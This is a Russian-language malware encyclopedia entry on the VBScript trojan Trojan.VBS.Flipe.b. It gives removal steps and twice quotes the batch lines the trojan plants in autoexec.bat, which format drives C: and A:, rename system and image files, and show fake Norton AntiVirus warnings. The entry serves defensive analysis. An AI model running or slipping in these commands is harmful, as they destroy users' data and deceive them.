Trojan.VBS.Flipe.b

Материал из Total Malware Info

Перейти к: навигация, поиск

Trojan.VBS.Flipe.b Троянская программа, нарушающая работоспособность компьютера. Имеет размер 1 348 байт. Написан на Visual Basic Script.

Деструктивная активность

При запуске троянец создает файл в каталоге Windows: 

%WinDir%\NAVW32.vbs

В который записывает следующую строку: 

echo NAV SUCKS, BUY ANOTHER ANTIVIRUS

Далее троянец в файл командного интерпретатора c:\autoexec.bat записывает строки: 

@echo off
cls
echo Norton AntiVirus 2004 has detectec a suspicious file on your computer, BloodHound.BAT.Unknown.
echo Norton AntiVirus 2004 cannot repair this file, please format your hardisk or use Kaspersky Anti-Virus or McAfee.
Format /y c:
Format /y A:
ReM Norton AntiVirus is installing Kaspersky AV and McAfee for format your computer
@echo off
REM Sorry, Norton is a very bad antivirus, please prefer other, Peter Szor, you're a moron, stop sucks and make a best heuristic for NAV, THE HEURISTIC OF NAV SUCKS!!!
rename *.vbs *.AGM
rename *.jpg *.AGM
rename *.exe *.AGM
rename *.sys *.AGM

Если на зараженном компьютере стоит Windows 9x, то после перезапуска системы форматируется гибкий диск А: и логический диск С: и для всех файлов текущего каталога с расширениями: 

*.vbs
*.jpg
*.exe
*.sys

троянец изменяет расширение на *.AGM.

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. Удалить оригинальный файл вируса (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  2. Удалить файлы:
    3. %WinDir%\NAVW32.vbs
  3. Если на зараженном компьютере установлена система Windows 9x:
  • Перезагрузить компьютер в «безопасном режиме» (в самом начале загрузки нажать и удерживать клавишу «F8», затем выбрать пункт «Safe mode in command promt only» в меню загрузки Windows). И в файле c:\autoexec.bat удалить следующие строки:
    • @echo off
cls
echo Norton AntiVirus 2004 has detectec a suspicious file on your computer, BloodHound.BAT.Unknown.
echo Norton AntiVirus 2004 cannot repair this file, please format your hardisk or use Kaspersky Anti-Virus or McAfee.
Format /y c:
Format /y A:
ReM Norton AntiVirus is installing Kaspersky AV and McAfee for format your computer
@echo off
REM Sorry, Norton is a very bad antivirus, please prefer other, Peter Szor, you're a moron, stop sucks and make a best heuristic for NAV, THE HEURISTIC OF NAV SUCKS!!!
rename *.vbs *.AGM
rename *.jpg *.AGM
rename *.exe *.AGM
rename *.sys *.AGM
Источник — «http://www.totalmalwareinfo.com/rus/Trojan.VBS.Flipe.b»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.